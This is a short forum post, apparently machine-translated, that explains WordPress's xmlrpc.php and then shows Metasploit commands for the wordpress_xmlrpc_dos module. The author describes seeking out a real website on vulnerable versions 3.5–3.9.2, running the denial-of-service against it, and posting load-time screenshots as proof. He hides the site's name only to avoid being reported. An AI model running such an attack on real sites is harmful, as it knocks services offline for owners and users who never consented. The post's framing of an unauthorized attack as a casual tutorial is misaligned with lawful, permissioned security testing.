DoS in Wordpress with xmlrpc.php

That there are guys I bring this small 

xmlrpc.php for what it serves? 

Xmlrpc.php is in charge of allowing us to post remotely through Microsoft Word, Textmate, Thunderbird, smartphones, among other clients. All this through the XML-RPC protocol. 

It will also be responsible for receiving the pingbacks (links of other blogs to some of our articles) and send the trackbacks (links from our blog to articles from another blog). 

Well the vulnerability of xmlrpc I long ago
this file is used to make a powerful attack Two, where friend metasploit already made his work: D

Code:
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos    
msf auxiliary(wordpress_xmlrpc_dos) > show actions          
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION    
msf auxiliary(wordpress_xmlrpc_dos) > show options          
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run

I look for a website with wp vulnerable versions: 3.5 - 3.9.2 

[Image: e46a0b8b2231979fc71a4e5bc67f661f.png]

I do not show the website to demonstrate something ethical (do not lie to denounce jajaj)

After completing the rhost and targeturi we give to run

[Image: 1e8bca89ba3e000c4b33926d05c560f5.png]

and with this we will be starting the two, the website falls at times, but let us see a
speed test of load before and after:
Before:

[Image: e59c5bbc6c63d6f55d19a2957789d6c7.png]

With the two active:

[Image: 5d6205bb8cd4b80cf1a8a461a8391642.png]

[Image: 493ebea8bb40cff4d0fe3491fc188ea1.png]

Regards!